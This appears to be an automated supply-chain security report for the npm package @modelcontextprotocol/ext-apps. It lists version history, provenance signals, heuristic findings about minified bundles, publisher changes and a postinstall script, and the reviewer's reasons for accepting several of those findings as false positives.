@modelcontextprotocol/ext-apps

Supply chain provenance

Status for the latest visible version.

SLSA provenance attestation npm registry signatures gitHead linked

Maintainers

jspahrsummerspcarletonfweinbergerthedspashwin-antochafik-ant

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source	Rule	Reason	Accepted by	When
source-diff	net-exec-file:dist/src/server/index.js	AI (source-diff): PostMessageTransport class using window.postMessage — standard browser IPC, not exfiltration.	ai	2026/04/26
source-diff	net-exec-file:dist/src/app-with-deps.js	AI (source-diff): Bundled Zod+MCP SDK code; network/exec patterns are from postMessage transport and schema validation, not malware.	ai	2026/04/26
source-diff	net-exec-file:dist/src/react/react-with-deps.js	AI (source-diff): Same bundled MCP transport + Zod patterns as app-with-deps. Legitimate browser messaging code.	ai	2026/04/26
source-diff	obfuscated-file:dist/src/app-with-deps.js	AI (source-diff): Bundled output from esbuild containing Zod + MCP SDK; '-with-deps' exports are documented in package.json. Standard minification, not obfuscation.	ai	2026/04/26
source-diff	obfuscated-file:dist/src/react/react-with-deps.js	AI (source-diff): Bundled React+Zod+MCP SDK output for the react-with-deps export. Standard esbuild minification.	ai	2026/04/26
source-diff	obfuscated-file:dist/src/server/index.js	AI (source-diff): Bundled server module with MCP SDK protocol handling. Standard esbuild minification output.	ai	2026/04/26
phantom-deps	phantom-dep:prettier	AI (phantom-deps): prettier is used as a CLI tool in npm scripts (generate:schemas, prettier:fix), not via JS import. Stable false positive.	ai	2026/04/26
install-scripts	install-script:postinstall	AI (install-scripts): Postinstall runs setup-bun.mjs to bootstrap Bun runtime used by the build system; graceful fallback with \|\| echo. Consistent with @oven/bun-* optional deps.	ai	2026/04/26

Versions (showing 17 of 17)

Version	Deps	Published
1.7.3	1 / 30	2026-06-01
1.7.2	1 / 30	2026-05-15
1.7.1	1 / 30	2026-04-27
1.7.0	1 / 30	2026-04-21
1.6.0	0 / 30	2026-04-14
1.5.0	0 / 30	2026-04-02
1.4.0	0 / 30	2026-04-02
1.3.2	0 / 30	2026-03-27
1.3.1	0 / 30	2026-03-23
1.1.1	0 / 29	2026-02-24
0.2.2	1 / 19	2025-12-17
0.2.1	1 / 19	2025-12-17
0.2.0	1 / 19	2025-12-16
0.1.0	4 / 15	2025-12-11
0.0.7	4 / 13	2025-12-09
0.0.6	4 / 13	2025-12-09
0.0.1	5 / 12	2025-12-08

v1.7.3

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.7.2

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.7.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.5.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.4.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.3.2

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.3.1

7 findings

HIGH Publisher changed: pcarleton → ochafik (on 2026-03-23) provenance

This version was published by a different npm account than previous versions on 2026-03-23. This could indicate a legitimate maintainer transition or an account compromise.

HIGH New obfuscated file: dist/src/app-with-deps.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/src/app-with-deps.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/src/server/index.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New obfuscated file: dist/src/react/react-with-deps.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/src/react/react-with-deps.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.1.1

9 findings

HIGH Package has 'postinstall' script install-scripts

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

HIGH Publisher changed: pcarleton → ochafik (on 2026-02-24) provenance

This version was published by a different npm account than previous versions on 2026-02-24. This could indicate a legitimate maintainer transition or an account compromise.

HIGH New obfuscated file: dist/src/app-with-deps.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/src/app-with-deps.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/src/server/index.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/src/server/index.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/src/react/react-with-deps.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/src/react/react-with-deps.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.2.2

2 findings

HIGH Package has 'postinstall' script install-scripts

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.2.1

2 findings

HIGH Package has 'postinstall' script install-scripts

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.2.0

2 findings

HIGH Package has 'postinstall' script install-scripts

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.1.0

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.0.7

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.0.6

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.0.1

1 finding

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.